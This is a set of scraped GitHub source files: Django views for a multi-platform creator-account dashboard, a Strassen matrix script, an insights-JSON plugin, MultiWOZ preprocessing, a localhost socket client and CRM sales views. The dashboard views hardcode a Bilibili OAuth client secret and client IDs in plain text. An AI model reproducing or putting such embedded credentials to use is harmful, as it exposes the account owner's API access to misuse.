\"zh_uid\": item.zh_uid,\n }\n\n data[\"rows\"].append(content)\n\n queryset_bjh = models.PlatFormBaiJiaHao.objects.filter(uid=uid)\n for index, item in enumerate(queryset_bjh):\n data[\"total\"] += index\n row_id += 1\n\n content = {\n \"id\": row_id,\n \"platform\": \"百家号\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_time,\n \"status\": item.expires_time > datetime.now(),\n \"app_id\": item.app_id,\n }\n\n data[\"rows\"].append(content)\n\n return JsonResponse(data)\n\n\ndef account_delete(request):\n \"\"\"删除授权账号\"\"\"\n\n delete_id = request.GET.get(\"delete_id\")\n\n dy_query = Q(open_id=delete_id)\n zh_query = Q(zh_uid=delete_id)\n bjh_query = Q(app_id=delete_id)\n bz_query = Q(openid=delete_id)\n\n # 利用 Q 对象,可以在一个查询中检查多个条件\n exists_dy = models.PlatFormDouYin.objects.filter(dy_query).exists()\n exists_zh = models.PlatFormZhiHu.objects.filter(zh_query).exists()\n exists_bjh = models.PlatFormBaiJiaHao.objects.filter(bjh_query).exists()\n exists_bz = models.PlatFormBilibili.objects.filter(bz_query).exists()\n\n if exists_dy:\n models.PlatFormDouYin.objects.filter(dy_query).delete()\n return JsonResponse({\"status\": True})\n elif exists_zh:\n models.PlatFormZhiHu.objects.filter(zh_query).delete()\n return JsonResponse({\"status\": True})\n elif exists_bjh:\n models.PlatFormBaiJiaHao.objects.filter(bjh_query).delete()\n return JsonResponse({\"status\": True})\n elif exists_bz:\n models.PlatFormBilibili.objects.filter(bz_query).delete()\n return JsonResponse({\"status\": True})\n\n return JsonResponse({\"status\": False})\n\n\ndef account_data_list(request):\n \"\"\"数据展示\"\"\"\n\n # 前端选中标签\n active_account_data = \"\"\n header_label = \"\"\n if request.path == \"/account/data/list/\":\n active_account_data = \"active\"\n header_label = \"数据展示\"\n\n context = {\"active_account_data\": active_account_data, \"header_label\": header_label}\n return render(request, \"account_data_list.html\", context)\n\n\ndef account_data_get(request):\n \"\"\"获取授权账号数据表格数据\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n row_id = 0\n data = {\"total\": 0, \"rows\": []}\n\n # 抖音数据发送到前端\n queryset = models.PlatFormData.objects.filter(uid=uid)\n for index, item in enumerate(queryset):\n row_id += 1\n data[\"total\"] += index\n content = {\n \"id\": row_id,\n \"platform\": item.platform,\n \"nickname\": item.nickname,\n \"type\": item.type,\n \"create_time\": item.create_time,\n \"title\": item.title,\n \"update_time\": item.update_time,\n \"like_count\": item.like_count,\n \"comment_count\": item.comment_count,\n \"play_count\": item.play_count,\n \"download_rec_count\": item.download_rec_count,\n \"share_vote_count\": item.share_vote_count,\n \"forward_collect_count\": item.forward_collect_count,\n \"share_url\": item.share_url,\n }\n data[\"rows\"].append(content)\n\n return JsonResponse(data)\n\n\ndef account_data_update(request):\n \"\"\"更新数据到数据库\"\"\"\n\n # 获取当前用户ID\n uid = request.session.get(\"info\").get(\"uid\")\n\n gd = GetData()\n\n dy_param = []\n dy_queryset = models.PlatFormDouYin.objects.filter(uid=uid)\n for item in dy_queryset:\n open_id = item.open_id\n access_token = item.access_token\n nickname = item.nickname\n uid = item.uid\n dy_param.append(\n {\n \"nickname\": nickname,\n \"open_id\": open_id,\n \"access_token\": access_token,\n \"uid\": uid,\n }\n )\n\n bz_param = []\n bz_queryset = models.PlatFormBilibili.objects.filter(uid=uid)\n for item in bz_queryset:\n openid = item.openid\n access_token = item.access_token\n nickname = item.nickname\n uid = item.uid\n bz_param.append(\n {\n \"nickname\": nickname,\n \"openid\": openid,\n \"access_token\": access_token,\n \"uid\": uid,\n }\n )\n\n zh_param = []\n zh_queryset = models.PlatFormZhiHu.objects.filter(uid=uid)\n for item in zh_queryset:\n z_c0 = item.z_c0\n zh_uid = item.zh_uid\n nickname = item.nickname\n uid = item.uid\n zh_param.append(\n {\"nickname\": nickname, \"z_c0\": z_c0, \"zh_uid\": zh_uid, \"uid\": uid}\n )\n\n bjh_param = []\n bjh_queryset = models.PlatFormBaiJiaHao.objects.filter(uid=uid)\n for item in bjh_queryset:\n bjhstoken = item.bjhstoken\n bduss = item.bduss\n token = item.token\n app_id = item.app_id\n nickname = item.nickname\n uid = item.uid\n bjh_param.append(\n {\n \"nickname\": nickname,\n \"bjhstoken\": bjhstoken,\n \"bduss\": bduss,\n \"token\": token,\n \"app_id\": app_id,\n \"uid\": uid,\n }\n )\n\n for param in dy_param:\n gd.get_douyin_data(\n param[\"nickname\"], param[\"open_id\"], param[\"access_token\"], param[\"uid\"]\n )\n for param in bz_param:\n gd.get_bilibili_data(\n param[\"nickname\"], param[\"access_token\"], param[\"openid\"], param[\"uid\"]\n )\n for param in zh_param:\n gd.get_zhihu_data(\n param[\"nickname\"], param[\"z_c0\"], param[\"zh_uid\"], param[\"uid\"]\n )\n for param in bjh_param:\n gd.get_baijiahao_data(\n param[\"nickname\"],\n param[\"bjhstoken\"],\n param[\"bduss\"],\n param[\"token\"],\n param[\"app_id\"],\n param[\"uid\"],\n )\n\n # 创建或更新数据\n for item in gd.works_list:\n exists = models.PlatFormData.objects.filter(item_id=item[\"item_id\"]).exists()\n if exists:\n models.PlatFormData.objects.filter(item_id=item[\"item_id\"]).update(**item)\n else:\n models.PlatFormData.objects.create(**item)\n\n # 判断原始数据有没有删除\n sql_item_id_list: list[tuple] = list(\n models.PlatFormData.objects.values_list(\"item_id\")\n ) # [(\"item_id\",),(\"item_id\",)]\n sql_item_id_list = [i[0] for i in sql_item_id_list] # [\"item_id\"]\n source_item_id_list = []\n for item in gd.works_list:\n source_item_id_list.append(item[\"item_id\"])\n sql_item_id_set = set(sql_item_id_list)\n source_item_id_set = set(source_item_id_list)\n difference_id = sql_item_id_set - source_item_id_set\n for item_id in difference_id:\n models.PlatFormData.objects.filter(item_id=item_id).delete()\n\n return JsonResponse({\"status\": True})\n\n\ndef account_auth_refresh(request):\n \"\"\"刷新refresh_token\"\"\"\n\n refresh_id = request.GET.get(\"refresh_id\")\n\n exists_zh = models.PlatFormZhiHu.objects.filter(zh_uid=refresh_id).exists()\n if exists_zh:\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"知乎账号刷新无效,如已过期,请删除后重新授权\"},\n }\n return JsonResponse(data)\n\n exists_bjh = models.PlatFormBaiJiaHao.objects.filter(app_id=refresh_id).exists()\n if exists_bjh:\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"百家号账号刷新无效,如已过期,请删除后重新授权\"},\n }\n return JsonResponse(data)\n\n exists_dy = models.PlatFormDouYin.objects.filter(open_id=refresh_id).exists()\n if exists_dy:\n row_object = models.PlatFormDouYin.objects.filter(open_id=refresh_id).first()\n rft_data = {\n \"refresh_token\": row_object.refresh_token,\n \"client_key\": \"awpswfd65m22r59e\",\n }\n rft_response = requests.post(\n \"https://open.douyin.com/oauth/renew_refresh_token/\", data=rft_data\n )\n rft_response_data = rft_response.json().get(\"data\", \"\")\n rft_response_message = rft_response.json().get(\"message\", \"\")\n\n if rft_response_message == \"success\":\n models.PlatFormDouYin.objects.filter(open_id=refresh_id).update(\n refresh_token=rft_response_data.get(\"refresh_token\")\n )\n act_data = {\n \"client_key\": \"awpswfd65m22r59e\",\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": rft_response_data.get(\"refresh_token\"),\n }\n act_response = requests.post(\n \"https://open.douyin.com/oauth/refresh_token/\", data=act_data\n )\n act_response_data = act_response.json().get(\"data\", \"\")\n act_response_message = act_response.json().get(\"message\")\n\n if act_response_message:\n access_token = act_response_data[\"access_token\"]\n expires_in = act_response_data[\"expires_in\"]\n expires_time = datetime.now() + timedelta(seconds=expires_in)\n expires_time = datetime.strftime(expires_time, \"%Y-%m-%d %H:%M:%S\")\n\n models.PlatFormDouYin.objects.filter(open_id=refresh_id).update(\n access_token=access_token, expires_in=expires_time\n )\n nickname = (\n models.PlatFormDouYin.objects.filter(open_id=refresh_id)\n .first()\n .nickname\n )\n data = {\n \"status\": True,\n \"data\": {\"stats\": \"刷新成功\", \"tips\": f\"{nickname}将在{expires_time}后过期\"},\n }\n return JsonResponse(data)\n\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"refresh_token过期,请删除授权账号重新授权\"},\n }\n return JsonResponse(data)\n\n exists_bz = models.PlatFormBilibili.objects.filter(openid=refresh_id).exists()\n if exists_bz:\n row_object = models.PlatFormBilibili.objects.filter(openid=refresh_id).first()\n rft_data = {\n \"refresh_token\": row_object.refresh_token,\n \"client_id\": \"302763bae0404eee\",\n \"client_secret\": \"aef73864a09a42bcbe1bbec8130ee5ed\",\n \"grant_type\": \"refresh_token\",\n }\n rft_response = requests.post(\n \"https://api.bilibili.com/x/account-oauth2/v1/refresh_token\", data=rft_data\n )\n rft_response_data = rft_response.json().get(\"data\", \"\")\n rft_response_code = rft_response.json().get(\"code\", \"\")\n\n if rft_response_code == 0:\n models.PlatFormBilibili.objects.filter(openid=refresh_id).update(\n refresh_token=rft_response_data.get(\"refresh_token\"),\n access_token=rft_response_data.get(\"access_token\"),\n expires_in=datetime.utcfromtimestamp(\n rft_response_data.get(\"expires_in\")\n ).strftime(\"%Y-%m-%d %H:%M:%S\"),\n )\n nickname = (\n models.PlatFormBilibili.objects.filter(openid=refresh_id)\n .first()\n .nickname\n )\n expires_time = (\n models.PlatFormBilibili.objects.filter(openid=refresh_id)\n .first()\n .expires_in\n )\n data = {\n \"status\": True,\n \"data\": {\"stats\": \"刷新成功\", \"tips\": f\"{nickname}将在{expires_time}后过期\"},\n }\n return JsonResponse(data)\n\n data = {\n \"status\": False,\n \"data\": {\"stats\": \"刷新失败\", \"tips\": \"refresh_token过期,请删除授权账号重新授权\"},\n }\n return JsonResponse(data)\n\n\ndef account_auth_detail(request):\n \"\"\"授权账号详情\"\"\"\n\n # 前端选中标签与头部标签\n active_account_auth = \"active\" if request.path == \"/account/auth/detail/\" else \"\"\n\n # 获取当前用户ID与当前平台账号 ID\n uid = request.session.get(\"info\").get(\"uid\")\n platform_uid = request.GET.get(\"platformid\", \"\")\n fields = [\n \"like_count\",\n \"comment_count\",\n \"play_count\",\n \"download_rec_count\",\n \"share_vote_count\",\n \"forward_collect_count\",\n ]\n data_dict = {}\n for field in fields:\n queryset = (\n models.PlatFormData.objects.filter(uid_id=uid)\n .filter(platform_uid=platform_uid)\n .aggregate(Sum(field))\n )\n data_dict.update(queryset)\n\n # 修改头部平台名称+账号昵称\n platform_info = models.PlatFormData.objects.filter(\n platform_uid=platform_uid\n ).first()\n nickname = platform_info.nickname\n platform = platform_info.platform\n platform_mapping = {\n 1: \"抖音\",\n 2: \"知乎\",\n 3: \"百家号\",\n 4: \"哔哩哔哩\",\n }\n platform_name = platform_mapping.get(platform, \"\")\n header_label = f\"{platform_name}-{nickname}\"\n\n context = {\n \"platform_uid\": platform_uid,\n \"active_account_auth\": active_account_auth,\n \"header_label\": header_label,\n \"data\": data_dict,\n }\n\n return render(request, \"account_auth_detail.html\", context)\n\n\ndef account_auth_detail_echarts(request):\n \"\"\"账号详情图表\"\"\"\n # 获取当前用户ID与当前平台账号 ID\n uid = request.session.get(\"info\", {}).get(\"uid\")\n platform_uid = request.GET.get(\"platform_uid\", \"\")\n\n # 获取指定平台的历史数据\n queryset = models.HistoryDate.objects.filter(uid=uid, platform_uid=platform_uid)\n\n # 提取日期和指标列表\n date = queryset.values_list(\"date\", flat=True)\n metrics = [\n \"like_sum\",\n \"comment_sum\",\n \"play_sum\",\n \"download_rec_sum\",\n \"share_vote_sum\",\n \"forward_collect_sum\",\n ]\n\n # 初始化空的 series_dict\n series_dict = {\n metric: list(queryset.values_list(metric, flat=True)) for metric in metrics\n }\n\n backend_data = {\n \"categories\": [i.strftime(\"%Y-%m-%d\") for i in date],\n \"seriesData\": series_dict,\n }\n\n return JsonResponse({\"status\": True, \"backendData\": backend_data})\n","repo_name":"HoveyChenB612/GrowthVision","sub_path":"mainsite/views/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":29224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11783509461","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Carlos Romera de Blas, Matemática y Física, AlCP-2\n\"\"\"\nimport random as rnd\nimport matplotlib.pyplot as plt\nimport time\n\n# Suma de matrices\ndef suma(A,B):\n n=len(A)\n C=[]\n for i in range(n):\n C.append([])\n for j in range (n):\n C[i].append(0) \n C[i][j]=A[i][j]+B[i][j] \n return C\n\n# Resta de matrices\ndef resta(A,B):\n n=len(A)\n C=[]\n for i in range(n):\n C.append([])\n for j in range (n):\n C[i].append(0) \n C[i][j]=A[i][j]-B[i][j] \n return C\n\n# Multiplicación de Strassen:\ndef mult_strassen(A,B):\n n=len(A)\n if n == 1:\n return [[A[0][0]*B[0][0]]]\n impar=n%2!=0\n if(impar):\n for i in range (n):\n A[i]=A[i]+[0]\n B[i]=B[i]+[0]\n A=A+[[0]*(n+1)]\n B=B+[[0]*(n+1)]\n n+=1\n \n A11, A12, A21, A22= [], [], [], []\n B11, B12, B21, B22= [], [], [], []\n for i in range((n//2)):\n A11 = A11 + [A[i][:(n//2)]]\n B11 = B11 + [B[i][:(n//2)]]\n \n A12 = A12 + [A[i][(n//2):]]\n B12 = B12 + [B[i][(n//2):]]\n \n A21 = A21 + [A[(n//2) + i][:(n//2)]]\n B21 = B21 + [B[(n//2) + i][:(n//2)]]\n \n A22 = A22 + [A[(n//2) + i][(n//2):]]\n B22 = B22 + [B[(n//2) + i][(n//2):]]\n \n M1=mult_strassen(suma(A11,A22),suma(B11,B22))\n M2=mult_strassen(suma(A21,A22),B11)\n M3=mult_strassen(A11,resta(B12,B22))\n M4=mult_strassen(A22,resta(B21,B11))\n M5=mult_strassen(suma(A11,A12),B22)\n M6=mult_strassen(resta(A21,A11),suma(B11,B12))\n M7=mult_strassen(resta(A12,A22),suma(B21,B22))\n \n C11=suma(resta(suma(M1,M4),M5),M7)\n C12=suma(M3,M5)\n C21=suma(M2,M4)\n C22=suma(suma(resta(M1,M2),M3),M6)\n\n C1, C2 = [], []\n for i in range((n//2)):\n C1 = C1 + [C11[i] + C12[i]]\n C2 = C2 + [C21[i] + C22[i]]\n C = C1 + C2\n\n if(impar):\n for i in range (n):\n C[i].pop()\n C.pop()\n \n return C\n\n# Programa para ver visualmente el tamaño de las matrices \n# frente al tiempo que tarda en multiplicarlas:\ndef grafica():\n mindigs = 1\n maxdigs = 50\n digstep = 1\n \n numdigs = []\n tiempos = []\n \n n = mindigs\n while n <= maxdigs:\n A = []\n B = []\n for i in range(n):\n A.append([])\n B.append([])\n for j in range (n):\n A[i].append(rnd.uniform(-1000.0,1000.0))\n B[i].append(rnd.uniform(-1000.0,1000.0))\n\n\n ini = time.time()\n mult_strassen(A, B)\n fin = time.time()\n numdigs += [n]\n t = fin-ini\n tiempos += [t]\n n += digstep\n \n plt.plot(numdigs, tiempos, \"g-\")\n plt.grid(b=True, which='major',axis='both', color='w', linestyle='--', linewidth=0.7)\n plt.xlabel('n=len(A)=len(B)')\n plt.ylabel('tiempo [seg]')\n ax = plt.gca()\n ax.set_facecolor((0.0, 0.0, 0.0))\n plt.savefig(\"mult_strassen.png\")\n plt.show()\n plt.clf()","repo_name":"KRomera/Computational-Algebra","sub_path":"actividad4.py","file_name":"actividad4.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"22410908606","text":"from __future__ import print_function\n\nimport glob\nimport json\nimport os\n\ntry:\n import risuclient.shell as risu\nexcept:\n import shell as risu\n\n# Load i18n settings from risu\n_ = risu._\n\nextension = \"__file__\"\npluginsdir = os.path.join(risu.risudir, \"plugins\", extension)\n\n\ndef init():\n \"\"\"\n Initializes module\n :return: List of triggers for extension\n \"\"\"\n return []\n\n\ndef run(data, quiet=False, options=None): # do not edit this line\n \"\"\"\n Executes plugin\n :param quiet: be more silent on returned information\n :param data: data to process\n :return: returncode, out, err\n \"\"\"\n\n skipped = int(os.environ[\"RC_SKIPPED\"])\n failed = int(os.environ[\"RC_FAILED\"])\n\n jsons = glob.glob(os.path.join(os.environ[\"RISU_ROOT\"], \"insights-*.json\"))\n mydata = []\n for insijson in jsons:\n filenamewithpath = insijson\n if (\n os.path.exists(filenamewithpath)\n and os.path.isfile(filenamewithpath)\n and os.access(filenamewithpath, os.R_OK)\n ):\n with open(filenamewithpath) as json_file:\n for line in json_file.readlines():\n try:\n mydata = json.loads(line)\n except:\n risu.LOG.debug(\n \"Error processing dataline in %s, skipping\" % json_file\n )\n if mydata and isinstance(mydata, dict):\n pass\n else:\n mydata = []\n\n else:\n mydata = []\n\n # Fill plugins with actual report received\n if \"reports\" in mydata:\n for plugin in mydata[\"reports\"]:\n # Fake plugin entries to integrate into 'data' dictionary\n pluginid = risu.calcid(plugin[\"component\"])\n data[pluginid] = {}\n data[pluginid][\"id\"] = pluginid\n data[pluginid][\"plugin\"] = \"%s.%s\" % (insijson, plugin[\"component\"])\n if \"links\" in plugin and \"kcs\" in plugin[\"links\"]:\n if isinstance(plugin[\"links\"][\"kcs\"], str):\n data[pluginid][\"kb\"] = plugin[\"links\"][\"kcs\"].split()\n elif isinstance(plugin[\"links\"][\"kcs\"], list):\n data[pluginid][\"kb\"] = \" \".join(plugin[\"links\"][\"kcs\"])\n else:\n data[pluginid][\"kb\"] = \"\"\n data[pluginid][\"category\"] = \"insights\"\n data[pluginid][\"hash\"] = pluginid\n data[pluginid][\"backend\"] = \"insights-core-unifier-merge-loader\"\n data[pluginid][\"name\"] = \"%s-%s\" % (insijson, plugin[\"rule_id\"])\n data[pluginid][\"result\"] = {}\n data[pluginid][\"result\"][\"err\"] = \"%s\" % plugin[\"details\"]\n data[pluginid][\"result\"][\"rc\"] = failed\n data[pluginid][\"result\"][\"out\"] = \"\"\n data[pluginid][\"priority\"] = 666\n # Fill empty values for missing fields\n for key in [\n \"description\",\n \"bugzilla\",\n \"path\",\n \"time\",\n \"long_name\",\n \"subcategory\",\n ]:\n data[pluginid][\"%s\" % key] = \"\"\n\n # Process plugins in skip to fake skipped entries\n if \"skips\" in mydata:\n for plugin in mydata[\"skips\"]:\n pluginid = risu.calcid(plugin[\"rule_fqdn\"])\n data[pluginid] = {}\n data[pluginid][\"id\"] = pluginid\n data[pluginid][\"plugin\"] = \"insights.%s\" % plugin[\"rule_fqdn\"]\n data[pluginid][\"category\"] = \"insights\"\n data[pluginid][\"hash\"] = pluginid\n data[pluginid][\"backend\"] = \"insights-core-unifier-merge-loader\"\n data[pluginid][\"name\"] = plugin[\"rule_fqdn\"]\n data[pluginid][\"result\"] = {}\n data[pluginid][\"result\"][\"err\"] = \"%s\" % plugin[\"reason\"]\n data[pluginid][\"result\"][\"rc\"] = skipped\n data[pluginid][\"result\"][\"out\"] = \"\"\n data[pluginid][\"priority\"] = 666\n # Fill empty values for missing fields\n for key in [\n \"description\",\n \"bugzilla\",\n \"path\",\n \"time\",\n \"long_name\",\n \"subcategory\",\n \"kb\",\n ]:\n data[pluginid][\"%s\" % key] = \"\"\n\n return data\n\n\ndef help(): # do not edit this line\n \"\"\"\n Returns help for plugin\n :return: help text\n \"\"\"\n\n commandtext = _(\n \"This hook proceses insights json to integrate them in risu results\"\n )\n return commandtext\n","repo_name":"risuorg/risu","sub_path":"risuclient/hooks/data/0/insights-core-unifier-merge-loader/insights-json.py","file_name":"insights-json.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"83"} +{"seq_id":"35008280901","text":"import json\n\n# post-processing on the actions/statuses\ndef postprocess(li):\n ret = []\n for s in li:\n if 'inform none' in s.lower():\n continue\n ret.append(s.lower().replace('select','ask-for-selection').replace(' none','').replace('choice','num_choices').replace('user','USER').replace('system','SYSTEM'))\n if len(ret) == 0:\n ret = ['NONE']\n ret = list(dict.fromkeys(ret)) # deduplicate\n return ret\n\n# converts a list of actions/statuses into a list of indices from an \"all\" list that contains all the actions/statuses\ndef listtoindex(li,all):\n return [all.index(x) for x in li]\n\n# the main function that post-processes the multiwoz dataset that supports multi-domains\ndef preprocess_multiwoz(datajson,trainlist,devlist,testlist,domain,namelist,outjson):\n \"\"\"\n datajson: the path to a json file that contains the multiwoz data\n trainlist: list of ids of training dialogs\n devlist: list of ids of dev dialogs\n testlist: list of ids of test dialogs\n domain: the domain to obtain trajectories for\n namelist: the list of ids of dialogs that belongs to this domain\n outjson: the json file to output the processed trajectories to\n \"\"\"\n datas = json.load(open(datajson))\n allacts = []\n allstatuses = []\n alltrajs = []\n domains = []\n nums = [0,0,0]\n counter = 0\n out = {'option_labels':allacts,'subtask_labels':allstatuses,'num_subtask':len(allstatuses),'num_option':len(allacts),'trajectories':alltrajs}\n for name in datas:\n if name.lower() not in delexjson:\n print('warning: not found in delex '+name)\n continue\n if name+'_0' not in namelist:\n continue\n dialog = datas[name]\n possible = []\n for g in dialog['new_goal']:\n possible.append(g)\n \n dialogmulti = [(len(dialog['log']),None)]\n startpoint = 0\n if name[0:3] in ['SNG','SSN','WOZ'] and len(dialogmulti) > 1:\n # we print a warning if we find actions from multiple domains in a supposed single-domain dialog\n print('Warning '+name)\n for idx,multi in enumerate(dialogmulti):\n endpt,dom = multi\n\n # a few dialogs have messed up endings, we only use the non-messed-up parts\n if name == 'SNG1213.json':\n endpt = 12\n if name == 'PMUL0237.json':\n endpt = 29\n if name == 'PMUL0382.json':\n endpt = 21\n\n actslist = []\n for turn in dialog['log'][startpoint:endpt]:\n speaker = 'user'\n if len(turn['metadata']) > 0:\n speaker = 'system'\n acts = []\n bookstatus = None\n offerstatus = True\n for actname in turn['dialog_act']:\n for lis in turn['dialog_act'][actname]:\n acnames = actname.split('-')\n if acnames[1] == 'Recommend':\n acnames[1] = 'Inform'\n if acnames[1] == 'NoOffer':\n acnames[1] == 'no-offer'\n offerstatus = False\n acts.append(speaker+' '+acnames[0]+'-'+acnames[1])\n elif actname == 'Booking-Inform':\n if speaker == 'system':\n acnames[1] = 'OfferBook'\n else:\n acnames[1] = 'Want-to-book'\n acts.append(speaker+' '+acnames[0]+'-'+acnames[1])\n acts.append(speaker+' '+acnames[0]+'-Inform '+lis[0])\n elif acnames[0] == 'Booking' and acnames[1] != 'Request':\n bookstatus = (acnames[1] == 'Book')\n acts.append('system '+acnames[0]+'-'+acnames[1])\n if bookstatus:\n acts.append('system '+acnames[0]+'-Inform '+lis[0])\n else:\n acts.append(speaker+' '+acnames[0]+'-'+acnames[1]+' '+lis[0])\n acts = postprocess(acts)\n for act in acts:\n if act not in allacts:\n allacts.append(act)\n actslist.append([acts,turn['text'],bookstatus,offerstatus,speaker])\n for i in range(len(actslist)):\n a,b,c,o,d = actslist[i]\n statuses = []\n for act in a:\n statuses.append('status '+act)\n if d == 'user' and i < len(actslist)-1:\n _,_,cc,oo,_ = actslist[i+1]\n if cc is not None:\n if cc:\n statuses.append('status can book')\n else:\n statuses.append('status cannot book')\n if not oo:\n statuses.append('status no available offer')\n for s in statuses:\n if s not in allstatuses:\n allstatuses.append(s)\n actslist[i].append(statuses)\n if name in trainlist:\n split='train'\n nums[0] += 1\n elif name in devlist:\n split='val'\n nums[1] += 1\n elif name in testlist:\n split='test'\n nums[2] += 1\n else:\n print(name+' not in train, val or test set')\n continue\n so=[]\n soindices=[]\n traj = {'name':name, 'split' : split,'subtasks_and_options':so,'subtask_and_option_indices':soindices}\n if dom not in domains:\n domains.append(dom)\n for i,(o,utter,_,_,speaker,s) in enumerate(actslist):\n delexed = getdelex(name,startpoint + i)\n if delexed is None:\n continue\n so.append(['option',o,utter,delexed])\n so.append(['subtask',s])\n soindices.append(['option',listtoindex(o,allacts)])\n soindices.append(['subtask',listtoindex(s,allstatuses)])\n alltrajs.append(traj)\n startpoint = endpt\n print(len(alltrajs))\n print(nums)\n print(counter)\n f=open(outjson,'w+')\n\n json.dump({domain:out},f,indent=2)\n\n\n# obtain delexicalized dialog utterances for E2E evaluation purposes\ndelexjson = json.load(open('../datasets/MultiWOZ/data_for_galaxy.json'))\ndef getdelex(name,num):\n delexdict = delexjson[name.lower()]\n tn = num // 2\n speaker = 'user_delex'\n if num > tn * 2:\n speaker = 'resp'\n try:\n return delexdict['log'][tn][speaker]\n except:\n print(\"warning\")\n print(name)\n print(num)\n return None\n\nimport torch\nif __name__=='__main__':\n # load list of dialog ids from each split\n trainlist,vallist,testlist = torch.load('../datasets/MultiWOZ/splitlists.pt')\n # load list of dialog ids from each domain combination\n namelists = json.load(open('../datasets/MultiWOZ/Domains.json'))\n for domain in namelists:\n if domain in ['police','hospital']:\n continue\n nl3 = namelists[domain]\n namelist = nl3['train']+nl3['val']+nl3['test']\n preprocess_multiwoz('../../MultiWOZ2_3/data.json',trainlist,vallist,testlist,domain.lower(),namelist,'../datasets/MultiWOZ/trajectories/'+domain+'_trajectories.json')\n\n\n\n\n\n\n\n \n \n \n \n \n \n\n \n\n \n\n\n\n\n","repo_name":"srsohn/TOD-Flow","sub_path":"src/preprocessing/preprocess_data_multiwoz_multi.py","file_name":"preprocess_data_multiwoz_multi.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35674868281","text":"# -*- coding: utf-8 -*-\nimport sys\nimport random\nimport socket\nimport argparse\nfrom helper import send, receive\n\ndef main(host, port):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n client.connect((host, port))\n print(f\"Connecting to {host}:{port}...\")\n while True:\n receive_buf = receive(client)\n print(f\"[*] Receive from server({host}:{port}): {receive_buf.decode('utf-8')}\")\n message = input(\">> \")\n send(client, message.encode(\"utf-8\"))\n except Exception as e:\n print(f\"[-] Error: {e}\")\n client.close()\n\ndef parse_options():\n parser = argparse.ArgumentParser(usage='%(prog)s [options]',\n description='Socket client @Qin',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\n'''\nExamples:\npython socket_client.py -h localhost -p 8888\n'''\n )\n parser.add_argument('-t','--host', type=str, default=\"localhost\")\n parser.add_argument('-p','--port', type=int, default=8888)\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n args = parse_options()\n main(args.host, args.port)\n","repo_name":"ariesduanmu/games","sub_path":"net_games/tcp_proxy/socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32687184807","text":"from datetime import datetime\n\nfrom django.shortcuts import render\nimport pymysql\nfrom django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.decorators.clickjacking import xframe_options_exempt\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET\n\nfrom customer.models import Customer, LinkMan\nfrom sales.models import SaleChance, CusDevPlan\nfrom system.models import TUser\n\n\n@xframe_options_exempt\n@require_GET\ndef sales_index(request):\n \"\"\"跳转营销管理首页\"\"\"\n return render(request, 'sales/sale_chance.html')\n\n\n@require_GET\ndef select_sale_chance_list(request):\n try:\n page_num = request.GET.get('page') # 页号\n page_size = request.GET.get('limit') # 页容量\n\n state = request.GET.get('state')\n # 客户名称\n customerName = request.GET.get('customerName')\n # 创建人\n createMan = request.GET.get('createMan')\n # 开发状态(客户开发计划使用)\n devResult = request.GET.get('devResult')\n\n if customerName:\n users = SaleChance.objects.filter(isValid=1, customerName=customerName).values()\n elif createMan:\n users = SaleChance.objects.filter(isValid=1, createMan=createMan).values()\n elif state:\n users = SaleChance.objects.filter(isValid=1, state=state).values()\n elif devResult:\n users = SaleChance.objects.filter(isValid=1, devResult=devResult).values()\n else:\n users = SaleChance.objects.filter(isValid=1).values()\n\n paginator = Paginator(users, page_size)\n users_list = paginator.page(page_num).object_list\n\n context = {\n 'code': 0,\n 'msg': '',\n 'count': len(users),\n 'data': list(users_list)\n }\n\n return JsonResponse(context)\n\n except Exception as e:\n return JsonResponse({'code': 400, 'msg': 'error'})\n\n\n@xframe_options_exempt\n@require_GET\ndef create_or_update_sales(request):\n \"\"\"跳转添加/修改营销机会页面\"\"\"\n # 获取营销机会主键\n saleChanceId = request.GET.get('saleChanceId')\n context = None\n if saleChanceId:\n # 根据营销机会主键查询\n sc = SaleChance.objects.get(pk=saleChanceId)\n context = {'sc': sc}\n return render(request, 'sales/add_update.html', context)\n\n\n@require_GET\ndef select_customer(request):\n \"\"\"查询客户\"\"\"\n customer = Customer.objects.values(\"id\", 'name') \\\n .filter(isValid=1).order_by('-id').all()\n return JsonResponse(list(customer), safe=False)\n\n\n@csrf_exempt\n@require_GET\ndef create_sale_chance(request):\n \"\"\"添加营销机会和联系人\"\"\"\n try:\n # 接收参数\n customerId = request.GET.get('customer')\n customerName = request.GET.get('customerName')\n chanceSource = request.GET.get('chanceSource')\n linkMan = request.GET.get('linkMan')\n linkPhone = request.GET.get('linkPhone')\n cgjl = request.GET.get('cgjl')\n overview = request.GET.get('overview')\n description = request.GET.get('description')\n assignMan = request.GET.get('assignMan')\n # 如果有联系人还要添加联系人表数据\n if linkMan:\n lm = LinkMan(cusId=customerId, linkName=linkMan, phone=linkPhone)\n lm.save()\n # 如果有分配人,添加分配时间,分配状态为已分配\n if assignMan != '0':\n sc = SaleChance(customerId=customerId, customerName=customerName,\n chanceSource=chanceSource, linkMan=linkMan,\n linkPhone=linkPhone,\n cgjl=cgjl, overview=overview, description=description,\n assignMan=assignMan, assignTime=datetime.now(), state=1,\n 